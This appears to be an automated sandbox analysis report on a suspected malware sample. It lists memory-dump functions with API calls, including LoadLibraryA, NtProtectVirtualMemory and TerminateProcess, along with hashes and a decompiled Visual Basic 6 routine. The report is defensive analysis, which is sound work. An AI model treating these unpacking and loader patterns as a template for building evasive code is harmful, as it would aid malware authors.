                                                  Function 02162B2B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 32\
                                                  • API String ID: 0-1455541109
                                                  • Opcode ID: da2de05e73a511c16182b1d28b2310e8829724da7781ec14cffda0b2235fef62
                                                  • Instruction ID: 31412ebc8125f583a4394b052205789a02d52c6921363491dc240e3797400aa9
                                                  • Opcode Fuzzy Hash: da2de05e73a511c16182b1d28b2310e8829724da7781ec14cffda0b2235fef62
                                                  • Instruction Fuzzy Hash: 2F11505268C3950EEB235BB41D9E37CEF17CE52895B1885CEDCD206483DF658475C22A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02162C16, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02162C23
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: ProcessTerminate
                                                  • String ID: sQt
                                                  • API String ID: 560597551-2654388485
                                                  • Opcode ID: a4fc8e974ec39bcd7cd658bb31a0050bfde3d3426513b29d57913948376ea1d4
                                                  • Instruction ID: e9421dd8a40c38bbcdfb6dcfeb1e2250feea56ae717b2d1bcd9d2119a1be461e
                                                  • Opcode Fuzzy Hash: a4fc8e974ec39bcd7cd658bb31a0050bfde3d3426513b29d57913948376ea1d4
                                                  • Instruction Fuzzy Hash: 2FB0121108060F0FC51177302D1D2CD2F438F161C7F1044208CCB0E102DB7688BD060A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02163264, Relevance: 1.7, APIs: 1, Instructions: 207libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrInitializeThunk.NTDLL(02162FE5,021606B0,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02163AC1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d8fbda83de525ce8a814cc33259527bdc588190672d80bd28cea7e411907503c
                                                  • Instruction ID: 502cfb5aa49749cbe6cddb3fdad541000acc50f23727dbe864a9bc920602fbed
                                                  • Opcode Fuzzy Hash: d8fbda83de525ce8a814cc33259527bdc588190672d80bd28cea7e411907503c
                                                  • Instruction Fuzzy Hash: 71618C616893C24EEB325A74895E3FA7F63AF42A14F4C40CDCCD157893CBA24565D319
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02163166, Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrInitializeThunk.NTDLL(02162FE5,021606B0,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02163AC1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 62dc94374021f59e16de5e2efd4e754289922305ecffbf67247c3b9f79021a8d
                                                  • Instruction ID: 04a5f8b624557923954accc3baef0d36d2b8a9cad77132a44dab7d2d0715f78d
                                                  • Opcode Fuzzy Hash: 62dc94374021f59e16de5e2efd4e754289922305ecffbf67247c3b9f79021a8d
                                                  • Instruction Fuzzy Hash: 74319B6165A3D18DD7329B74456E3EA7F63AF53B41F88408DCCC216483CBA38512D71A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02164B2E, Relevance: 1.6, APIs: 1, Instructions: 109libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(?,8802EDAC,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02164B8C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 1bb7647d3e8bb89e24d777ffe702f703ed29e0ab3e0e27b4461c1d5c9bcc5a17
                                                  • Instruction ID: 957f518922c857cbd63c7e1c035aa8d07a07515dc2dff47567b2705d6051516d
                                                  • Opcode Fuzzy Hash: 1bb7647d3e8bb89e24d777ffe702f703ed29e0ab3e0e27b4461c1d5c9bcc5a17
                                                  • Instruction Fuzzy Hash: E831CD7664936A8FCF24DF7881A427E7F639E41220B48805CDCC617B43CBB2E8618755
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 021631DC, Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrInitializeThunk.NTDLL(02162FE5,021606B0,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02163AC1
                                                    • Part of subcall function 02164B00: LoadLibraryA.KERNELBASE(?,8802EDAC,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02164B8C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: InitializeLibraryLoadThunk
                                                  • String ID:
                                                  • API String ID: 3353482560-0
                                                  • Opcode ID: ae0720a7016de03f194aa1651cdb8f8f8f78f6b72f9a9f7774dc986fc37fa43b
                                                  • Instruction ID: e07da4f6851192140853369c31cddd0ec0174fb2c313cfc528fcf01d1e5a3435
                                                  • Opcode Fuzzy Hash: ae0720a7016de03f194aa1651cdb8f8f8f78f6b72f9a9f7774dc986fc37fa43b
                                                  • Instruction Fuzzy Hash: A831887165A3D58ED7329F74456D3EA7FA3AF53B40F58808CCCC206183C7A28522D71A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02164B00, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(?,8802EDAC,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02164B8C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: be1c3232846b2679ed2815a159d2bb244cc9a287c0ed218c4749ec8087f6bf40
                                                  • Instruction ID: 1b4a4a52668968202b293b8f022a51c62fbbcab7e2515afb8463db75e639d52e
                                                  • Opcode Fuzzy Hash: be1c3232846b2679ed2815a159d2bb244cc9a287c0ed218c4749ec8087f6bf40
                                                  • Instruction Fuzzy Hash: 7B014C686842166DDF387B34C9ACB7E25579F95720F10816EBCA193184CF65C4F58A12
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 021639EE, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrInitializeThunk.NTDLL(02162FE5,021606B0,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02163AC1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ca90ff46559e285eb12fc659bf2d066b27c903a66dfe78a825be98857bc0ceaa
                                                  • Instruction ID: 7647d6b3702afccd0c78b913039e302ca2d983b5e67df86122d18f02dfccc20b
                                                  • Opcode Fuzzy Hash: ca90ff46559e285eb12fc659bf2d066b27c903a66dfe78a825be98857bc0ceaa
                                                  • Instruction Fuzzy Hash: 0A116B52AAF3D14CD713AB74005A159FF23DE6362571C84CDC4E2168A3CB828127E35E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02164ADA, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(?,8802EDAC,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02164B8C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 1d0a57d1d516e6d1071ed1029096c232b9bf1c93fa593e5c06bf67763b877066
                                                  • Instruction ID: 4dde58b42168a1f278a71028f6f027465e7ac8be96fa459733c081261c6bf4b1
                                                  • Opcode Fuzzy Hash: 1d0a57d1d516e6d1071ed1029096c232b9bf1c93fa593e5c06bf67763b877066
                                                  • Instruction Fuzzy Hash: 16F08B593583174DDF3C6A3685A873E9903CF90664F24411CDDE152040DFD5C464065A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02162B86, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02162C23
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: ProcessTerminate
                                                  • String ID:
                                                  • API String ID: 560597551-0
                                                  • Opcode ID: b24b5722ea50c1af60559699284a48a84066491837a8a5369ccb952a2a91877e
                                                  • Instruction ID: b184bdc85ff2fcd575a4aed45fc7bf127281179619f5a25197034f4045c50323
                                                  • Opcode Fuzzy Hash: b24b5722ea50c1af60559699284a48a84066491837a8a5369ccb952a2a91877e
                                                  • Instruction Fuzzy Hash: 21D05B511582594DDE116A741E6E16D9F078A462BE6340948DCD2054D2EFF38175D219
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02162FAA, Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,02162F61,02162FE5,021606B0,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188), ref: 02162FCD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 964323d7d9ff80bfafd8c2a463c2788c196ebb6c8c10258cf0772213c7cd4ff7
                                                  • Instruction ID: 8e874393603ba8837d0b99948a0b274af67f60583a65b3a20b00deb9a615eab9
                                                  • Opcode Fuzzy Hash: 964323d7d9ff80bfafd8c2a463c2788c196ebb6c8c10258cf0772213c7cd4ff7
                                                  • Instruction Fuzzy Hash: D9D01270BE5341B9FB3016206D1BFC51A175B51B61FB44009BF853D9C2D2D25555521F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02162F95, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,02162F61,02162FE5,021606B0,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188), ref: 02162FCD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 4c1d42ce430af45ecf636fad266444b41d4c29fe7dea2f70d211837a0a4c5ac0
                                                  • Instruction ID: a7b704422243e0aeaa3362d3cbe2e54b3d8bd7704d86d05db33d0b11da6e63a2
                                                  • Opcode Fuzzy Hash: 4c1d42ce430af45ecf636fad266444b41d4c29fe7dea2f70d211837a0a4c5ac0
                                                  • Instruction Fuzzy Hash: B4D01230BD4301B6F73447109C5BFD962565B51F10FB54005FF553D5C083F16A548516
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02162BD9, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02162C23
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: ProcessTerminate
                                                  • String ID:
                                                  • API String ID: 560597551-0
                                                  • Opcode ID: c13ec980a03731ac6d7b55b1a44f31c3b0c6825dd93e6fd7ee172b7021dce987
                                                  • Instruction ID: 5d9c85d748018c5805479bec0ce2c61cf7dd9a29cad735c68859d6c523bc80ed
                                                  • Opcode Fuzzy Hash: c13ec980a03731ac6d7b55b1a44f31c3b0c6825dd93e6fd7ee172b7021dce987
                                                  • Instruction Fuzzy Hash: FCC08C2008C10A5DCD241A301D6EFBD16464B023AAF300602ADB62A1C58A3040F4CA12
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02162BF2, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02162C23
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: ProcessTerminate
                                                  • String ID:
                                                  • API String ID: 560597551-0
                                                  • Opcode ID: a21d898002fbe0e7077218c432e80927cc8d6c4879c4ce72df3671d70a71625d
                                                  • Instruction ID: 0597d15fd8b00b9b6ac938b3e07b09bcdfc7bec83c6e65fe7e09ddec136a4736
                                                  • Opcode Fuzzy Hash: a21d898002fbe0e7077218c432e80927cc8d6c4879c4ce72df3671d70a71625d
                                                  • Instruction Fuzzy Hash: 94C08C2005815A9DCE212A702E3F69D2F4B8F023BAB300608DCE7194D3CA7080B58B4A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 02161968, Relevance: .4, Instructions: 374COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 1cc7ff590c64028c4d001c651c4a1dae42615aaa6ad33e130b43c3bb8a890670
                                                  • Instruction ID: 66a69388533f81a93247060f0aef3d42f4a5a30b38e975726a82a0574b946024
                                                  • Opcode Fuzzy Hash: 1cc7ff590c64028c4d001c651c4a1dae42615aaa6ad33e130b43c3bb8a890670
                                                  • Instruction Fuzzy Hash: 69C1E471780602BFD7189F28CCA8BEAB3A5BF05750F558229DCA993381D735A864CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02165866, Relevance: .2, Instructions: 201COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoadMemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 3389902171-0
                                                  • Opcode ID: 9b72ae200aded8453c26c5532c0b9136a4956e91a136dba2b3f2e762eac62e1e
                                                  • Instruction ID: 349dd11aac2f358ef48a8672fcf926dda991169c9ce93cebd56bf29f957a1404
                                                  • Opcode Fuzzy Hash: 9b72ae200aded8453c26c5532c0b9136a4956e91a136dba2b3f2e762eac62e1e
                                                  • Instruction Fuzzy Hash: 25610A60A84342DECB34CF7884D87A97B939F13260FC9829DCCA64B2D7C3358496C716
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 021658D6, Relevance: .2, Instructions: 181libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(?,8802EDAC,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02164B8C
                                                    • Part of subcall function 02165DB1: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02165978,00000040,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02165DCA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoadMemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 3389902171-0
                                                  • Opcode ID: 90055c2b178ee8932bb8c97b21a285a40cbcfba0abb7a6bfcbd7a0ddc04c395d
                                                  • Instruction ID: b91821db75af4f8974cea6875596d9d3ebe599c783a08ba4cc6911cdc8ee58e8
                                                  • Opcode Fuzzy Hash: 90055c2b178ee8932bb8c97b21a285a40cbcfba0abb7a6bfcbd7a0ddc04c395d
                                                  • Instruction Fuzzy Hash: 6B51F760A84342DEDB34CF7884987A97B939F13270FD9829DCCA64F2D7D3258486C716
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02161FF8, Relevance: .1, Instructions: 126COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 17a854d93a287768208255a085a3dfeb5e8b06422f96170591f2aade5219ef9d
                                                  • Instruction ID: b33fd6fff490d2535859bf9af3c097de3a1a83cf8d740bfe530fb6130ee419cc
                                                  • Opcode Fuzzy Hash: 17a854d93a287768208255a085a3dfeb5e8b06422f96170591f2aade5219ef9d
                                                  • Instruction Fuzzy Hash: A441F870284345EFEB28AE348C9CBFC72A2AF10754F96415AED565B1E1C7B5C8D0CA12
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02161E12, Relevance: .1, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 270248d16810362454b61097e40a25eb98ebfa77a7ad345ab4b3ccc7b7d7f90c
                                                  • Instruction ID: a7f4ad1c30901a711de0dab92f90d6486cb8eb3e9002515b3a4db44aef9a63ea
                                                  • Opcode Fuzzy Hash: 270248d16810362454b61097e40a25eb98ebfa77a7ad345ab4b3ccc7b7d7f90c
                                                  • Instruction Fuzzy Hash: 0B31F671B84212BFD758AA28CC69BFE73E5BF14350F5A413DEC6AD3281C72098998B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02164F41, Relevance: .0, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3ea136cdca05ce135c6a1f1a63826acf89a457539906e83f64ff510a55d3f5b0
                                                  • Instruction ID: 6e3dbc23bf9fcfdb73569494fb0b92c7ad52f49d333c4ab9f568ba6bfa5d7922
                                                  • Opcode Fuzzy Hash: 3ea136cdca05ce135c6a1f1a63826acf89a457539906e83f64ff510a55d3f5b0
                                                  • Instruction Fuzzy Hash: 3FF0B4743407019FD728DE18C6E5FBF73A6AF41B90F254598ED558B1A1D325D860C700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02162C30, Relevance: .0, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a450913a79158d00a63193114dccc694f9a6bd3821e74a91e2f2d82764598fd9
                                                  • Instruction ID: ba52d64e1080891329e4286f52b5253828c2a21b3d844a6dd6e161fd80aacf0b
                                                  • Opcode Fuzzy Hash: a450913a79158d00a63193114dccc694f9a6bd3821e74a91e2f2d82764598fd9
                                                  • Instruction Fuzzy Hash: 61B092B22404808FEF02CF0CC881B4073A0FB14A48B4804D0E002CF612C224ED01CB04
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02164AB9, Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1903588ec1422cb5156f05cce6065a4d2016d166d452008b186e1d5a76685650
                                                  • Instruction ID: cec51f846ac57450b90562dc821ff76b91ebf561526901befc6177e5cc7d5c34
                                                  • Opcode Fuzzy Hash: 1903588ec1422cb5156f05cce6065a4d2016d166d452008b186e1d5a76685650
                                                  • Instruction Fuzzy Hash: B7B092782126818FC241DA08C090E8073A0FB08710FC144C0E881C7B11C224E8018900
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00412F70, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 140COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 57%
                                                  			E00412F70(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				void* _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				intOrPtr _v112;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				void* _v252;
				signed int _v256;
				signed int _v268;
				intOrPtr* _v272;
				signed int _v276;
				signed int _t72;
				char* _t76;
				char* _t80;
				signed int _t84;
				void* _t116;
				void* _t118;
				intOrPtr _t119;

				_t119 = _t118 - 0xc;
				 *[fs:0x0] = _t119;
				L00401210();
				_v16 = _t119;
				_v12 = 0x4011b8;
				_v8 = 0;
				_t72 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401216, _t116);
				L004012B2();
				_push(_v28);
				L004012A6();
				L00401306();
				_push(_t72);
				_push(0x404ea4);
				L0040130C();
				asm("sbb eax, eax");
				_v252 =  ~( ~( ~_t72));
				L004012FA();
				_t76 = _v252;
				if(_t76 != 0) {
					_v144 = 0x80020004;
					_v152 = 0xa;
					_v128 = 0x80020004;
					_v136 = 0xa;
					_v112 = 0x80020004;
					_v120 = 0xa;
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					_v64 = 0x80020004;
					_v72 = 0xa;
					if( *0x414010 != 0) {
						_v272 = 0x414010;
					} else {
						_push("H9a");
						_push(0x405094);
						L004012EE();
						_v272 = 0x414010;
					}
					_t80 =  &_v40;
					L004012E8();
					_v252 = _t80;
					_t84 =  *((intOrPtr*)( *_v252 + 0x50))(_v252,  &_v36, _t80,  *((intOrPtr*)( *((intOrPtr*)( *_v272)) + 0x338))( *_v272));
					asm("fclex");
					_v256 = _t84;
					if(_v256 >= 0) {
						_v276 = _v276 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x404e0c);
						_push(_v252);
						_push(_v256);
						L00401324();
						_v276 = _t84;
					}
					_v268 = _v36;
					_v36 = _v36 & 0x00000000;
					_v48 = _v268;
					_v56 = 8;
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push( &_v56);
					L004012A0();
					L00401306();
					L004012E2();
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_t76 =  &_v56;
					_push(_t76);
					_push(7);
					L004012C4();
				}
				_push(0x4131da);
				L004012FA();
				L004012FA();
				return _t76;
			}




































                                                  0x00412f73
                                                  0x00412f82
                                                  0x00412f8e
                                                  0x00412f96
                                                  0x00412f99
                                                  0x00412fa0
                                                  0x00412faf
                                                  0x00412fba
                                                  0x00412fbf
                                                  0x00412fc2
                                                  0x00412fcc
                                                  0x00412fd1
                                                  0x00412fd2
                                                  0x00412fd7
                                                  0x00412fde
                                                  0x00412fe4
                                                  0x00412fee
                                                  0x00412ff3
                                                  0x00412ffc
                                                  0x00413002
                                                  0x0041300c
                                                  0x00413016
                                                  0x0041301d
                                                  0x00413027
                                                  0x0041302e
                                                  0x00413035
                                                  0x0041303c
                                                  0x00413043
                                                  0x0041304a
                                                  0x00413051
                                                  0x00413058
                                                  0x00413066
                                                  0x00413083
                                                  0x00413068
                                                  0x00413068
                                                  0x0041306d
                                                  0x00413072
                                                  0x00413077
                                                  0x00413077
                                                  0x004130a7
                                                  0x004130ab
                                                  0x004130b0
                                                  0x004130c8
                                                  0x004130cb
                                                  0x004130cd
                                                  0x004130da
                                                  0x004130fc
                                                  0x004130dc
                                                  0x004130dc
                                                  0x004130de
                                                  0x004130e3
                                                  0x004130e9
                                                  0x004130ef
                                                  0x004130f4
                                                  0x004130f4
                                                  0x00413106
                                                  0x0041310c
                                                  0x00413116
                                                  0x00413119
                                                  0x00413126
                                                  0x0041312d
                                                  0x00413131
                                                  0x00413135
                                                  0x00413139
                                                  0x0041313d
                                                  0x00413141
                                                  0x00413142
                                                  0x0041314c
                                                  0x00413154
                                                  0x0041315f
                                                  0x00413166
                                                  0x0041316a
                                                  0x0041316e
                                                  0x00413172
                                                  0x00413176
                                                  0x00413177
                                                  0x0041317a
                                                  0x0041317b
                                                  0x0041317d
                                                  0x00413182
                                                  0x00413185
                                                  0x004131cc
                                                  0x004131d4
                                                  0x004131d9

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 00412F8E
                                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,00401216), ref: 00412FBA
                                                  • #523.MSVBVM60(?,?,?,?,?,00401216), ref: 00412FC2
                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,00401216), ref: 00412FCC
                                                  • __vbaStrCmp.MSVBVM60(00404EA4,00000000,?,?,?,?,?,00401216), ref: 00412FD7
                                                  • __vbaFreeStr.MSVBVM60(00404EA4,00000000,?,?,?,?,?,00401216), ref: 00412FEE
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 00413072
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004130AB
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,00000050), ref: 004130EF
                                                  • #596.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 00413142
                                                  • __vbaStrMove.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0041314C
                                                  • __vbaFreeObj.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 00413154
                                                  • __vbaFreeVarList.MSVBVM60(00000007,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0041317D
                                                  • __vbaFreeStr.MSVBVM60(004131DA,00404EA4,00000000,?,?,?,?,?,00401216), ref: 004131CC
                                                  • __vbaFreeStr.MSVBVM60(004131DA,00404EA4,00000000,?,?,?,?,?,00401216), ref: 004131D4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$Free$Move$#523#596CheckChkstkCopyHresultListNew2
                                                  • String ID: H9a
                                                  • API String ID: 2450112860-3053050142
                                                  • Opcode ID: cba4b94cf14e4ab5847180193a2e17e2259208cf537085ab1f9640a937fcf633
